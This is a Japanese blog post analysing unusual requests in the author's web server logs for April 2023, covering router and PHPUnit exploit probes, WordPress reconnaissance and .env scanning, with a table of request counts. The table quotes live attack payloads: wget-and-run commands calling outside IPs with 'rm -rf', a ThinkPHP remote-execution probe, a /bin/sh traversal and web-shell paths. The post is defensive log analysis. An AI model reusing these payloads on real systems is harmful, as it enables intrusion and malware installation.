webサーバのログの分析2023 4月分

2023-05-03 技術系

公開している web サーバのログから通常のアクセスではない通信について分析しました。

多かったリクエスト

ルータなどのネットワーク機器の調査

脆弱性が報告されているルーターなどで使われているログイン画面へアクセスする通信

JVNDB-2016-004125 - JVN iPedia - 脆弱性対策情報データベース

login.cgi

TOTOLINKの脆弱性

コマンドインジェクションの脆弱性があり、Miraiの攻撃に利用されている脆弱性みたいです。

TOTOLINKの新たな脆弱性がBeastmode Mirai攻撃の標的に

/cgi-bin/downloadFlile.cgi

ネットワーク機器の脆弱性でMiraiなどで悪用されているみたいです。

ルータの脆弱性「CVE-2020-10173」を利用するIoTマルウェア | トレンドマイクロ セキュリティブログ

/boaform/admin/formLogin

PHPUnitのevalをリモート実行

PHPのユニットテストツールのPHPUnitの脆弱性を利用してのeval()を実行しようとする通信

/wp-content/themes/seotheme/db.php?u
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Wordpressの情報取集

ログイン画面の確認

/wp-login.php
/post/wp-login.php

wlwmanifest.xmlの調査

Windows Live Writerというツールの設定ファイルが入っているかの調査みたいです。ブログ投稿用のツールでWordPressのプラグインもあるみたいなのでそのプラグインが入っているかの調査だと思われます。

/wp1/wp-includes/wlwmanifest.xml
/wp/wp-includes/wlwmanifest.xml
/wordpress/wp-includes/wlwmanifest.xml
/web/wp-includes/wlwmanifest.xml
/test/wp-includes/wlwmanifest.xml
/site/wp-includes/wlwmanifest.xml
/cms/wp-includes/wlwmanifest.xml
/blog/wp-includes/wlwmanifest.xml

不審な通信の一覧

uri count
/robots.txt 1048
/.env 456
//.env 325
/dispatch.asp 306
/sw.js 291
login.cgi 234
/cgi-bin/downloadFlile.cgi 148
* 140
/boaform/admin/formLogin 133
/wp-content/themes/seotheme/db.php?u 120
/wp-login.php 118
/wso112233.php 84
/.git/config 79
/wp-content/wso112233.php 76
/index.xml 74
/wp-content/shell20211028.php 72
/bala.php 72
/xleet-shell.php 69
/wp-includes/wp-class.php 69
/wp-content/plugins/sid/sidwso.php 69
/wp-content/plugins/core-stab/index.php 68
/wp-class.php 66
/wp-content/plugins/ioptimization/IOptimize.php?rchk 59
/geoserver/web/ 57
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 52
/actuator/gateway/routes 49
//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 42
/_profiler/phpinfo 41
/wp-content/themes/classic/inc/index.php 40
mstshash=Domain 39
/sellers.json 38
/wp-content/updates.php 33
/app-ads.txt 32
/shell?cd+/tmp;rm+-rf+*;wget+167.71.210.63/jaws;sh+/tmp/jaws 30
/post/wp-login.php 29
/HNAP1/ 28
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 27
/aab8 26
/aaa9 24
/actuator/health 22
/upl.php 20
/tags/cms 20
/manifest.js 20
/geoip/ 20
/client/get_targets 20
mstshash=Administr 19
/wp-includes/wlwmanifest.xml 19
\xC0/\xC00\xC0+\xC0,\xCC\xA8\xCC\xA9\xC0\x13\xC0\x09\xC0\x14\xC0 18
/core/.env 18
/app/.env 18
/xmlrpc.php?rsd 17
/wp1/wp-includes/wlwmanifest.xml 17
/wp/wp-includes/wlwmanifest.xml 17
/wordpress/wp-includes/wlwmanifest.xml 17
/web/wp-includes/wlwmanifest.xml 17
/test/wp-includes/wlwmanifest.xml 17
/site/wp-includes/wlwmanifest.xml 17
/laravel/.env 17
/cms/wp-includes/wlwmanifest.xml 17
/blog/wp-includes/wlwmanifest.xml 17
/ab2g 17
//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js 17
/private/api/v1/service/premaster 16
/owa/auth/x.js 16
/manager/html 16
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application 16
/cdn-cgi/trace 16
/archives/2019 16
/wp2/wp-includes/wlwmanifest.xml 15
/website/wp-includes/wlwmanifest.xml 15
/t4 15
/style.php?sig=update&domain=51.79.124.111 15
/sito/wp-includes/wlwmanifest.xml 15
/sitemap.xml 15
/owa/auth/logon.aspx 15
/news/wp-includes/wlwmanifest.xml 15
/api/.env 15
/ab2h 15
/.env.save 15
/tags/honeypot 14
/about 14
/.well-known/security.txt 14
/index.php 13
/config.json 13
/autodiscover/autodiscover.json?@zdi/Powershell 13
/shop/wp-includes/wlwmanifest.xml 12
/shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws 12
/info.php 12
/explore 12
/2019/wp-includes/wlwmanifest.xml 12
/.env.production 12
/.env.prod 12
/.env.old 12
/.env.development 12
7 11
157.90.120.57:4444 11
/wp-comments-post.php 11
/local/.env 11
/development/.env 11
/debug/default/view?panel=config 11
/apps/.env 11
/2020/wp-includes/wlwmanifest.xml 11
/wp/wp-login.php 10
/wordpress/wp-login.php 10
/version 10
/system/.env 10
/sources/.env 10
/shared/.env 10
/script/.env 10
/rest/.env 10
/private/.env 10
/live_env 10
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 10
/fedex/.env 10
/enviroments/.env.production 10
/enviroments/.env 10
/docker/.env 10
/cp/.env 10
/console/ 10
/cms/.env 10
/blog/wp-login.php 10
/back/.env 10
/application/.env 10
/admin-app/.env 10
/_ignition/execute-solution 10
/Autodiscover/Autodiscover.xml 10
/.well-known/assetlinks.json 10
/.well-known/apple-app-site-association 10
/.env.project 10
/.env.dist 10
/public/.env 9
/manager/text/list 9
/hudson 9
/geoserver 9
/druid/index.html 9
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 9

follow us in feedly

comments powered by Disqus

関連記事

新着記事